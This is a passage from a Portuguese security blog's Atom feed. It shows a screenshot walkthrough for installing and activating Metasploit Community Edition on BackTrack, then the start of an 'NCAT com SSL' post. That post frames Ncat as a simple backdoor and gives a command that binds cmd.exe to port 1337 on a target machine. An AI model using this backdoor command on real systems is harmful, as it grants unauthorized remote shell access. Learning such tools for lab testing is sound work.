/&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Lhe pergunta qual a porta que será utilizada, deixe a padrão 3790 e clique em "Forward".&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-n9ZF8TbOzVM/TrG9JEGMV9I/AAAAAAAAATo/HE2VEnKkNrI/s1600/ScreenShot008.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="302" src="http://4.bp.blogspot.com/-n9ZF8TbOzVM/TrG9JEGMV9I/AAAAAAAAATo/HE2VEnKkNrI/s400/ScreenShot008.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Aqui ele pede para você inserir o nome de sua maquina para atender através de um domínio e os dias de validade de seu certificado. Você pode deixar com os valores padrões que aparecer e clicar em "Forward".&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-uAzqoC1te5c/TrG9JLgZmVI/AAAAAAAAATw/fs_Klkkzxxs/s1600/ScreenShot009.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="296" src="http://1.bp.blogspot.com/-uAzqoC1te5c/TrG9JLgZmVI/AAAAAAAAATw/fs_Klkkzxxs/s400/ScreenShot009.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Se você deseja realizar atualizações automaticamente, deixe como "Yes" e pressione "Forward".&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-m0JvvrZbk4g/TrG9JRc_BnI/AAAAAAAAAUA/kaVcPlkySjQ/s1600/ScreenShot010.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="302" src="http://4.bp.blogspot.com/-m0JvvrZbk4g/TrG9JRc_BnI/AAAAAAAAAUA/kaVcPlkySjQ/s400/ScreenShot010.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;A mensagem diz que o Metasploit começará o processo de instalação em seu computador. Clique em "Forward".&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-cbEHrWBgbrE/TrG9JuYpZfI/AAAAAAAAAUM/69XX2v9ErZY/s1600/ScreenShot011.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="310" src="http://3.bp.blogspot.com/-cbEHrWBgbrE/TrG9JuYpZfI/AAAAAAAAAUM/69XX2v9ErZY/s400/ScreenShot011.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Abaixo a instalação está em andamento.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-sYHwn4OSYhI/TrG9J8TROQI/AAAAAAAAAUY/0nbAJnnC4Dg/s1600/ScreenShot012.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="302" src="http://4.bp.blogspot.com/-sYHwn4OSYhI/TrG9J8TROQI/AAAAAAAAAUY/0nbAJnnC4Dg/s400/ScreenShot012.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Clique em "Finish" para finalizar a instalação (óbvio não?).&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-okGIk5hBXAQ/TrG9W7J7JEI/AAAAAAAAAUk/slsuADd1-jA/s1600/ScreenShot013.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="303" src="http://2.bp.blogspot.com/-okGIk5hBXAQ/TrG9W7J7JEI/AAAAAAAAAUk/slsuADd1-jA/s400/ScreenShot013.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Um erro sobre certificado pode ser apresentado, clique em "Continue".&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-9RZtNgmXFqE/TrG9XDoz5pI/AAAAAAAAAUs/KuFTXPMOoIg/s1600/ScreenShot014.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="267" src="http://3.bp.blogspot.com/-9RZtNgmXFqE/TrG9XDoz5pI/AAAAAAAAAUs/KuFTXPMOoIg/s400/ScreenShot014.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-BitnYfQwkUU/TrG9XP7711I/AAAAAAAAAU4/Lx55XSjwS08/s1600/ScreenShot015.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="106" src="http://3.bp.blogspot.com/-BitnYfQwkUU/TrG9XP7711I/AAAAAAAAAU4/Lx55XSjwS08/s400/ScreenShot015.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Se você utilizar o FireFox no BackTrack, ao inserir a URL para acessar a interface web do metasploit, será apresentada um erro de certificado, conforme figura abaixo.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-Y5AUOogVWD8/TrG9XbSzzkI/AAAAAAAAAVI/nGJH7Vhe-k4/s1600/ScreenShot016.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="262" src="http://4.bp.blogspot.com/-Y5AUOogVWD8/TrG9XbSzzkI/AAAAAAAAAVI/nGJH7Vhe-k4/s400/ScreenShot016.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Precisaremos adicionar um excessão, clique em "Add Exception".&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-nDosbwDeX_4/TrG9XvHDWlI/AAAAAAAAAVY/_epcV-LrnP4/s1600/ScreenShot017.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="267" src="http://1.bp.blogspot.com/-nDosbwDeX_4/TrG9XvHDWlI/AAAAAAAAAVY/_epcV-LrnP4/s400/ScreenShot017.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Na nova janela que abri, clique em "Confirm Security Exception".&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-RTTyYVEJsKo/TrG-GI7B1rI/AAAAAAAAAVg/pOKY2E4CCiQ/s1600/ScreenShot018.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="400" src="http://1.bp.blogspot.com/-RTTyYVEJsKo/TrG-GI7B1rI/AAAAAAAAAVg/pOKY2E4CCiQ/s400/ScreenShot018.png" width="398" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;E abrirá normalmente a tela de login do Metasploit. Agora basta cadastrarmos um usuário e senha para acessarmos o ambiente.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-AxksJm2Ipw0/TrG-GX4bThI/AAAAAAAAAVo/fJrp7O4HDP4/s1600/ScreenShot019.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="267" src="http://4.bp.blogspot.com/-AxksJm2Ipw0/TrG-GX4bThI/AAAAAAAAAVo/fJrp7O4HDP4/s400/ScreenShot019.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Como estamos utilizando BackTrack, você precisará aceitar este aceite dando permissão ao NoScript que vem instalado por padrão no FireFox/BackTrack. Clique "Options" na parte inferior direita do desktop e depois em "Allow https://localhost".&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-Lu31gmZYT5A/TrG-GdBclUI/AAAAAAAAAV8/wiB8_UkMkPA/s1600/ScreenShot020.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="266" src="http://1.bp.blogspot.com/-Lu31gmZYT5A/TrG-GdBclUI/AAAAAAAAAV8/wiB8_UkMkPA/s400/ScreenShot020.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Preencha as informações necessárias e depois em "Create Account".&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-3mnC3Du31sc/TrG-G6_Y6mI/AAAAAAAAAWE/TJQqsd8nal4/s1600/ScreenShot021.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="262" src="http://3.bp.blogspot.com/-3mnC3Du31sc/TrG-G6_Y6mI/AAAAAAAAAWE/TJQqsd8nal4/s400/ScreenShot021.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: red;"&gt;ERROS&lt;/span&gt;&lt;/b&gt;: O possível erro que pode ocasionar nesta etapa é a criação da senha, você precisará especificar uma senha contendo 8 dígitos, entre eles deve haver, letras&amp;nbsp;maiúsculas&amp;nbsp;e minusculas, caracteres especiais e número, exemplo, RoB3r7@0!.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-VkYX8JCRPsM/TrG-HA1zPJI/AAAAAAAAAWQ/YU02HzQs6gk/s1600/ScreenShot022.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="120" src="http://3.bp.blogspot.com/-VkYX8JCRPsM/TrG-HA1zPJI/AAAAAAAAAWQ/YU02HzQs6gk/s400/ScreenShot022.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Será lhe apresenta a tela para a ativação do software.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-ENlizRlF86E/TrG-aCJuDCI/AAAAAAAAAWc/iEEBltgC6-A/s1600/ScreenShot023.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="260" src="http://2.bp.blogspot.com/-ENlizRlF86E/TrG-aCJuDCI/AAAAAAAAAWc/iEEBltgC6-A/s400/ScreenShot023.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Clique no link "Register your Metasploit license here!", você será redirecionado a uma nova página.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-FpT0jL6b27A/TrG-aUmlEvI/AAAAAAAAAWw/aLmzuDTR-zU/s1600/ScreenShot025.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="261" src="http://2.bp.blogspot.com/-FpT0jL6b27A/TrG-aUmlEvI/AAAAAAAAAWw/aLmzuDTR-zU/s400/ScreenShot025.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Ao lado inferior esquerdo, referente ao Metasploit Community, basta pressionar "Go" se foi preenchido corretamente o mesmo e-mail cadastrado anteriormente.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-09SiI6t_sXY/TrG-aljLmNI/AAAAAAAAAXA/8n3mxgo0Bx4/s1600/ScreenShot026.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="376" src="http://1.bp.blogspot.com/-09SiI6t_sXY/TrG-aljLmNI/AAAAAAAAAXA/8n3mxgo0Bx4/s400/ScreenShot026.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Verifique seu e-mail, copie o serial e cole na página abaixo, pressionando "Next", você será redirecionado novamente a tela de ativação do Metasploit.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-xi63lIUlpjI/TrN9kvu1eKI/AAAAAAAAAYI/c8sYZ5nUyHk/s1600/ScreenShot027.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="308" src="http://4.bp.blogspot.com/-xi63lIUlpjI/TrN9kvu1eKI/AAAAAAAAAYI/c8sYZ5nUyHk/s400/ScreenShot027.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-uJbYtZGoZ-Q/TrG-bFFWubI/AAAAAAAAAXI/DgK0Haam33o/s1600/ScreenShot027.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Falto pouco, calma! Agora clique em "Activate License" e...&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-b6zutTDPJRk/TrG-9KB-yKI/AAAAAAAAAXY/d9pHib74tsA/s1600/ScreenShot028.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-7YzzPS10XV8/TrN9eXCkvVI/AAAAAAAAAYA/glcP7Kk2fJM/s1600/ScreenShot028.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="213" src="http://3.bp.blogspot.com/-7YzzPS10XV8/TrN9eXCkvVI/AAAAAAAAAYA/glcP7Kk2fJM/s400/ScreenShot028.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;...VOILÀ! Metasploit Community Edition ativado com sucesso, prontinho para ser utilizado. :D&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-iJc25f3Meok/TrG-9S9OPZI/AAAAAAAAAXk/WJGIZEJF2xM/s1600/ScreenShot029.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;img border="0" height="262" src="http://3.bp.blogspot.com/-iJc25f3Meok/TrG-9S9OPZI/AAAAAAAAAXk/WJGIZEJF2xM/s400/ScreenShot029.png" width="400" /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;A instalação será a parte mais fácil se comparado com as próximas partes que escrevei.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Bom, qualquer dúvida durante a instalação, deixe seu comentário aqui mesmo no blog ou envie um e-mail para espreto@hacktraining.com.br que terei o prazer em ajudar a sanar as possíveis dúvidas.&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Até a próxima pessoal!&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;:wq!&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: -webkit-auto;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3387717746309894142-2692982027470896223?l=codesec.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://codesec.blogspot.com/feeds/2692982027470896223/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='http://codesec.blogspot.com/2011/11/metasploit-community-edition.html#comment-form' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/2692982027470896223'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3387717746309894142/posts/default/2692982027470896223'/><link rel='alternate' type='text/html' href='http://codesec.blogspot.com/2011/11/metasploit-community-edition.html' title='Metasploit Community Edition - Instalation'/><author><name>Roberto dos Santos Soares (espreto)</name><uri>http://www.blogger.com/profile/17178261473696242751</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_fzuc26ZLs28/Sw8wj5YvVYI/AAAAAAAAAAM/d9P6GREunBw/S220/Roberto.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-B0LVA4PYPRA/TrG8bY3JDHI/AAAAAAAAASU/Y1CxZINK2tY/s72-c/ScreenShot001.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3387717746309894142.post-1648285033822177397</id><published>2011-11-04T06:19:00.003-02:00</published><updated>2011-11-04T06:21:43.881-02:00</updated><title type='text'>NCAT com SSL</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: white; font-size: 11px;"&gt;Acredito que a grande maioria conhece o Netcat, não? Pois bem, em uma espécie de variação, surge o Ncat. Sim, são diferentes antes que perguntem. Porém a grande maioria das suas funcionalidades se&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-size: 11px; text-align: justify;"&gt;assemelham se comparadas. Ncat utiliza os protocolos TCP e UDP para sua comunicação e também funciona sobre o IPv4 e o IPv6. Uma das características mais simples do ncat é a transferência de&amp;nbsp;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-size: 11px;"&gt;dados entre dois hosts (linux &amp;lt;--&amp;gt; linux, windows &amp;lt;--&amp;gt; windows ou linux &amp;lt;--&amp;gt; windows) de forma simplificada. Também nos dá a possibilidade de executar comandos remotamente como se&amp;nbsp;estivéssemos&amp;nbsp;em nossa própria máquina, ainda se não bastasse, conseguimos prover uma "dose" considerável de segurança, utilizando o SSL (Secure&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="background-color: white; font-size: 11px;"&gt;Sockets Layer), que é um protocolo criptográfico responsável por prover uma comunicação segura sob a Internet. Imagine isso para um backdoor simples heim?&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Verdana, sans-serif; font-size: 11px;"&gt;Onde:&lt;/span&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Verdana, sans-serif; font-size: 11px;"&gt;192.168.0.125 é o IP do atacante. (BackTrack)&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class="Apple-style-span" style="background-color: white; font-family: Verdana, sans-serif; font-size: 11px;"&gt;192.168.0.147 é o IP do alvo. (XP)&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;b style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;b style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif;"&gt;Sem SSL&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;No alvo digite o comando: ncat.exe -v -l 1337 -e cmd --allow 192.168.0.125&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 